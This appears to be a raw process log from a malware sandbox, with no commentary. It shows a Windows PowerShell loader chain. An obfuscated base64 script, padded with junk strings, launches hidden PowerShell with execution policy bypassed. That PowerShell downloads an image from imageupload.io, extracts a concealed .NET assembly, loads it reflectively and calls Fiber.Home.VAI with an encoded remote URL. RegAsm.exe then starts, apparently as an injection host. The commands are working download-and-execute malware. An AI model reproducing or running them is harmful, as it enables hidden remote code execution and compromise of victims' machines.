powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JPzXsYGNBpPzXsYGNG0PzXsYGNYQBnPzXsYGNGUPzXsYGNVQByPzXsYGNGwPzXsYGNIPzXsYGNPzXsYGN9PzXsYGNCPzXsYGNPzXsYGNJwBoPzXsYGNHQPzXsYGNdPzXsYGNBwPzXsYGNHMPzXsYGNOgPzXsYGNvPzXsYGNC8PzXsYGNaQBtPzXsYGNGEPzXsYGNZwBlPzXsYGNHUPzXsYGNcPzXsYGNBsPzXsYGNG8PzXsYGNYQBkPzXsYGNC4PzXsYGNaQBvPzXsYGNC8PzXsYGNaQBiPzXsYGNC8PzXsYGNdwBzPzXsYGNDgPzXsYGNTQBBPzXsYGNEoPzXsYGNNgBlPzXsYGNHPzXsYGNPzXsYGNdPzXsYGNBpPzXsYGNEwPzXsYGNZgBHPzXsYGNHUPzXsYGNXwPzXsYGNxPzXsYGNDYPzXsYGNOQPzXsYGN3PzXsYGNDcPzXsYGNMwPzXsYGN4PzXsYGNDQPzXsYGNOQPzXsYGNyPzXsYGNC4PzXsYGNagBwPzXsYGNGcPzXsYGNJwPzXsYGN7PzXsYGNCQPzXsYGNdwBlPzXsYGNGIPzXsYGNQwBsPzXsYGNGkPzXsYGNZQBuPzXsYGNHQPzXsYGNIPzXsYGNPzXsYGN9PzXsYGNCPzXsYGNPzXsYGNTgBlPzXsYGNHcPzXsYGNLQBPPzXsYGNGIPzXsYGNagBlPzXsYGNGMPzXsYGNdPzXsYGNPzXsYGNgPzXsYGNFMPzXsYGNeQBzPzXsYGNHQPzXsYGNZQBtPzXsYGNC4PzXsYGNTgBlPzXsYGNHQPzXsYGNLgBXPzXsYGNGUPzXsYGNYgBDPzXsYGNGwPzXsYGNaQBlPzXsYGNG4PzXsYGNdPzXsYGNPzXsYGN7PzXsYGNCQPzXsYGNaQBtPzXsYGNGEPzXsYGNZwBlPzXsYGNEIPzXsYGNeQB0PzXsYGNGUPzXsYGNcwPzXsYGNgPzXsYGND0PzXsYGNIPzXsYGNPzXsYGNkPzXsYGNHcPzXsYGNZQBiPzXsYGNEMPzXsYGNbPzXsYGNBpPzXsYGNGUPzXsYGNbgB0PzXsYGNC4PzXsYGNRPzXsYGNBvPzXsYGNHcPzXsYGNbgBsPzXsYGNG8PzXsYGNYQBkPzXsYGNEQPzXsYGNYQB0PzXsYGNGEPzXsYGNKPzXsYGNPzXsYGNkPzXsYGNGkPzXsYGNbQBhPzXsYGNGcPzXsYGNZQBVPzXsYGNHIPzXsYGNbPzXsYGNPzXsYGNpPzXsYGNDsPzXsYGNJPzXsYGNBpPzXsYGNG0PzXsYGNYQBnPzXsYGNGUPzXsYGNVPzXsYGNBlPzXsYGNHgPzXsYGNdPzXsYGNPzXsYGNgPzXsYGND0PzXsYGNIPzXsYGNBbPzXsYGNFMPzXsYGNeQBzPzXsYGNHQPzXsYGNZQBtPzXsYGNC4PzXsYGNVPzXsYGNBlPzXsYGNHgPzXsYGNdPzXsYGNPzXsYGNuPzXsYGNEUPzXsYGNbgBjPzXsYGNG8PzXsYGNZPzXsYGNBpPzXsYGNG4PzXsYGNZwBdPzXsYGNDoPzXsYGNOgBVPzXsYGNFQPzXsYGNRgPzXsYGN4PzXsYGNC4PzXsYGNRwBlPzXsYGNHQPzXsYGNUwB0PzXsYGNHIPzXsYGNaQBuPzXsYGNGcPzXsYGNKPzXsYGNPzXsYGNkPzXsYGNGkPzXsYGNbQBhPzXsYGNGcPzXsYGNZQBCPzXsYGNHkPzXsYGNdPzXsYGNBlPzXsYGNHMPzXsYGNKQPzXsYGN7PzXsYGNCQPzXsYGNcwB0PzXsYGNGEPzXsYGNcgB0PzXsYGNEYPzXsYGNbPzXsYGNBhPzXsYGNGcPzXsYGNIPzXsYGNPzXsYGN9PzXsYGNCPzXsYGNPzXsYGNJwPzXsYGN8PzXsYGNDwPzXsYGNQgBBPzXsYGNFMPzXsYGNRQPzXsYGN2PzXsYGNDQPzXsYGNXwBTPzXsYGNFQPzXsYGNQQBSPzXsYGNFQPzXsYGNPgPzXsYGN+PzXsYGNCcPzXsYGNOwPzXsYGNkPzXsYGNGUPzXsYGNbgBkPzXsYGNEYPzXsYGNbPzXsYGNBhPzXsYGNGcPzXsYGNIPzXsYGNPzXsYGN9PzXsYGNCPzXsYGNPzXsYGNJwPzXsYGN8PzXsYGNDwPzXsYGNQgBBPzXsYGNFMPzXsYGNRQPzXsYGN2PzXsYGNDQPzXsYGNXwBFPzXsYGNE4PzXsYGNRPzXsYGNPzXsYGN+PzXsYGND4PzXsYGNJwPzXsYGN7PzXsYGNCQPzXsYGNcwB0PzXsYGNGEPzXsYGNcgB0PzXsYGNEkPzXsYGNbgBkPzXsYGNGUPzXsYGNePzXsYGNPzXsYGNgPzXsYGND0PzXsYGNIPzXsYGNPzXsYGNkPzXsYGNGkPzXsYGNbQBhPzXsYGNGcPzXsYGNZQBUPzXsYGNGUPzXsYGNePzXsYGNB0PzXsYGNC4PzXsYGNSQBuPzXsYGNGQPzXsYGNZQB4PzXsYGNE8PzXsYGNZgPzXsYGNoPzXsYGNCQPzXsYGNcwB0PzXsYGNGEPzXsYGNcgB0PzXsYGNEYPzXsYGNbPzXsYGNBhPzXsYGNGcPzXsYGNKQPzXsYGN7PzXsYGNCQPzXsYGNZQBuPzXsYGNGQPzXsYGNSQBuPzXsYGNGQPzXsYGNZQB4PzXsYGNCPzXsYGNPzXsYGNPQPzXsYGNgPzXsYGNCQPzXsYGNaQBtPzXsYGNGEPzXsYGNZwBlPzXsYGNFQPzXsYGNZQB4PzXsYGNHQPzXsYGNLgBJPzXsYGNG4PzXsYGNZPzXsYGNBlPzXsYGNHgPzXsYGNTwBmPzXsYGNCgPzXsYGNJPzXsYGNBlPzXsYGNG4PzXsYGNZPzXsYGNBGPzXsYGNGwPzXsYGNYQBnPzXsYGNCkPzXsYGNOwPzXsYGNkPzXsYGNHMPzXsYGNdPzXsYGNBhPzXsYGNHIPzXsYGNdPzXsYGNBJPzXsYGNG4PzXsYGNZPzXsYGNBlPzXsYGNHgPzXsYGNIPzXsYGNPzXsYGNtPzXsYGNGcPzXsYGNZQPzXsYGNgPzXsYGNDPzXsYGNPzXsYGNIPzXsYGNPzXsYGNtPzXsYGNGEPzXsYGNbgBkPzXsYGNCPzXsYGNPzXsYGNJPzXsYGNBlPzXsYGNG4PzXsYGNZPzXsYGNBJPzXsYGNG4PzXsYGNZPzXsYGNBlPzXsYGNHgPzXsYGNIPzXsYGNPzXsYGNtPzXsYGNGcPzXsYGNdPzXsYGNPzXsYGNgPzXsYGNCQPzXsYGNcwB0PzXsYGNGEPzXsYGNcgB0PzXsYGNEkPzXsYGNbgBkPzXsYGNGUPzXsYGNePzXsYGNPzXsYGN7PzXsYGNCQPzXsYGNcwB0PzXsYGNGEPzXsYGNcgB0PzXsYGNEkPzXsYGNbgBkPzXsYGNGUPzXsYGNePzXsYGNPzXsYGNgPzXsYGNCsPzXsYGNPQPzXsYGNgPzXsYGNCQPzXsYGNcwB0PzXsYGNGEPzXsYGNcgB0PzXsYGNEYPzXsYGNbPzXsYGNBhPzXsYGNGcPzXsYGNLgBMPzXsYGNGUPzXsYGNbgBnPzXsYGNHQPzXsYGNaPzXsYGNPzXsYGN7PzXsYGNCQPzXsYGNYgBhPzXsYGNHMPzXsYGNZQPzXsYGN2PzXsYGNDQPzXsYGNTPzXsYGNBlPzXsYGNG4PzXsYGNZwB0PzXsYGNGgPzXsYGNIPzXsYGNPzXsYGN9PzXsYGNCPzXsYGNPzXsYGNJPzXsYGNBlPzXsYGNG4PzXsYGNZPzXsYGNBJPzXsYGNG4PzXsYGNZPzXsYGNBlPzXsYGNHgPzXsYGNIPzXsYGNPzXsYGNtPzXsYGNCPzXsYGNPzXsYGNJPzXsYGNBzPzXsYGNHQPzXsYGNYQByPzXsYGNHQPzXsYGNSQBuPzXsYGNGQPzXsYGNZQB4PzXsYGNDsPzXsYGNJPzXsYGNBiPzXsYGNGEPzXsYGNcwBlPzXsYGNDYPzXsYGNNPzXsYGNBDPzXsYGNG8PzXsYGNbQBtPzXsYGNGEPzXsYGNbgBkPzXsYGNCPzXsYGNPzXsYGNPQPzXsYGNgPzXsYGNCQPzXsYGNaQBtPzXsYGNGEPzXsYGNZwBlPzXsYGNFQPzXsYGNZQB4PzXsYGNHQPzXsYGNLgBTPzXsYGNHUPzXsYGNYgBzPzXsYGNHQPzXsYGNcgBpPzXsYGNG4PzXsYGNZwPzXsYGNoPzXsYGNCQPzXsYGNcwB0PzXsYGNGEPzXsYGNcgB0PzXsYGNEkPzXsYGNbgBkPzXsYGNGUPzXsYGNePzXsYGNPzXsYGNsPzXsYGNCPzXsYGNPzXsYGNJPzXsYGNBiPzXsYGNGEPzXsYGNcwBlPzXsYGNDYPzXsYGNNPzXsYGNBMPzXsYGNGUPzXsYGNbgBnPzXsYGNHQPzXsYGNaPzXsYGNPzXsYGNpPzXsYGNDsPzXsYGNJPzXsYGNBjPzXsYGNG8PzXsYGNbQBtPzXsYGNGEPzXsYGNbgBkPzXsYGNEIPzXsYGNeQB0PzXsYGNGUPzXsYGNcwPzXsYGNgPzXsYGND0PzXsYGNIPzXsYGNBbPzXsYGNFMPzXsYGNeQBzPzXsYGNHQPzXsYGNZQBtPzXsYGNC4PzXsYGNQwBvPzXsYGNG4PzXsYGNdgBlPzXsYGNHIPzXsYGNdPzXsYGNBdPzXsYGNDoPzXsYGNOgBGPzXsYGNHIPzXsYGNbwBtPzXsYGNEIPzXsYGNYQBzPzXsYGNGUPzXsYGNNgPzXsYGN0PzXsYGNFMPzXsYGNdPzXsYGNByPzXsYGNGkPzXsYGNbgBnPzXsYGNCgPzXsYGNJPzXsYGNBiPzXsYGNGEPzXsYGNcwBlPzXsYGNDYPzXsYGNNPzXsYGNBDPzXsYGNG8PzXsYGNbQBtPzXsYGNGEPzXsYGNbgBkPzXsYGNCkPzXsYGNOwPzXsYGNkPzXsYGNGwPzXsYGNbwBhPzXsYGNGQPzXsYGNZQBkPzXsYGNEEPzXsYGNcwBzPzXsYGNGUPzXsYGNbQBiPzXsYGNGwPzXsYGNeQPzXsYGNgPzXsYGND0PzXsYGNIPzXsYGNBbPzXsYGNFMPzXsYGNeQBzPzXsYGNHQPzXsYGNZQBtPzXsYGNC4PzXsYGNUgBlPzXsYGNGYPzXsYGNbPzXsYGNBlPzXsYGNGMPzXsYGNdPzXsYGNBpPzXsYGNG8PzXsYGNbgPzXsYGNuPzXsYGNEEPzXsYGNcwBzPzXsYGNGUPzXsYGNbQBiPzXsYGNGwPzXsYGNeQBdPzXsYGNDoPzXsYGNOgBMPzXsYGNG8PzXsYGNYQBkPzXsYGNCgPzXsYGNJPzXsYGNBjPzXsYGNG8PzXsYGNbQBtPzXsYGNGEPzXsYGNbgBkPzXsYGNEIPzXsYGNeQB0PzXsYGNGUPzXsYGNcwPzXsYGNpPzXsYGNDsPzXsYGNJPzXsYGNB0PzXsYGNHkPzXsYGNcPzXsYGNBlPzXsYGNCPzXsYGNPzXsYGNPQPzXsYGNgPzXsYGNCQPzXsYGNbPzXsYGNBvPzXsYGNGEPzXsYGNZPzXsYGNBlPzXsYGNGQPzXsYGNQQBzPzXsYGNHMPzXsYGNZQBtPzXsYGNGIPzXsYGNbPzXsYGNB5PzXsYGNC4PzXsYGNRwBlPzXsYGNHQPzXsYGNVPzXsYGNB5PzXsYGNHPzXsYGNPzXsYGNZQPzXsYGNoPzXsYGNCcPzXsYGNRgBpPzXsYGNGIPzXsYGNZQByPzXsYGNC4PzXsYGNSPzXsYGNBvPzXsYGNG0PzXsYGNZQPzXsYGNnPzXsYGNCkPzXsYGNOwPzXsYGNkPzXsYGNG0PzXsYGNZQB0PzXsYGNGgPzXsYGNbwBkPzXsYGNCPzXsYGNPzXsYGNPQPzXsYGNgPzXsYGNCQPzXsYGNdPzXsYGNB5PzXsYGNHPzXsYGNPzXsYGNZQPzXsYGNuPzXsYGNEcPzXsYGNZQB0PzXsYGNE0PzXsYGNZQB0PzXsYGNGgPzXsYGNbwBkPzXsYGNCgPzXsYGNJwBWPzXsYGNEEPzXsYGNSQPzXsYGNnPzXsYGNCkPzXsYGNLgBJPzXsYGNG4PzXsYGNdgBvPzXsYGNGsPzXsYGNZQPzXsYGNoPzXsYGNCQPzXsYGNbgB1PzXsYGNGwPzXsYGNbPzXsYGNPzXsYGNsPzXsYGNCPzXsYGNPzXsYGNWwBvPzXsYGNGIPzXsYGNagBlPzXsYGNGMPzXsYGNdPzXsYGNBbPzXsYGNF0PzXsYGNXQPzXsYGNgPzXsYGNCgPzXsYGNJwBkPzXsYGNEgPzXsYGNaPzXsYGNPzXsYGNwPzXsYGNEwPzXsYGNbQPzXsYGN5PzXsYGNGgPzXsYGNYgBHPzXsYGNGwPzXsYGNbwBjPzXsYGNDIPzXsYGNRgB0PzXsYGNEwPzXsYGNegBFPzXsYGNHkPzXsYGNTQBTPzXsYGNDQPzXsYGNMwBNPzXsYGNGkPzXsYGNNPzXsYGNPzXsYGNwPzXsYGNE0PzXsYGNVPzXsYGNBJPzXsYGNHUPzXsYGNTgBUPzXsYGNGsPzXsYGNdgBMPzXsYGNHoPzXsYGNcPzXsYGNB3PzXsYGNGQPzXsYGNSPzXsYGNBSPzXsYGNG8PzXsYGNJwPzXsYGNgPzXsYGNCwPzXsYGNIPzXsYGNPzXsYGNnPzXsYGNGQPzXsYGNZgBkPzXsYGNGYPzXsYGNZPzXsYGNPzXsYGNnPzXsYGNCPzXsYGNPzXsYGNLPzXsYGNPzXsYGNgPzXsYGNCcPzXsYGNZPzXsYGNBmPzXsYGNGQPzXsYGNZgPzXsYGNnPzXsYGNCPzXsYGNPzXsYGNLPzXsYGNPzXsYGNgPzXsYGNCcPzXsYGNZPzXsYGNBmPzXsYGNGQPzXsYGNZgPzXsYGNnPzXsYGNCPzXsYGNPzXsYGNLPzXsYGNPzXsYGNgPzXsYGNCcPzXsYGNZPzXsYGNBhPzXsYGNGQPzXsYGNcwBhPzXsYGNCcPzXsYGNIPzXsYGNPzXsYGNsPzXsYGNCPzXsYGNPzXsYGNJwBkPzXsYGNGUPzXsYGNJwPzXsYGNgPzXsYGNCwPzXsYGNIPzXsYGNPzXsYGNnPzXsYGNGMPzXsYGNdQPzXsYGNnPzXsYGNCkPzXsYGNKQPzXsYGN=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('PzXsYGN','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
2628powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm9hbGloc2FtLzEyMS43Mi40MTIuNTkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
2768RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2996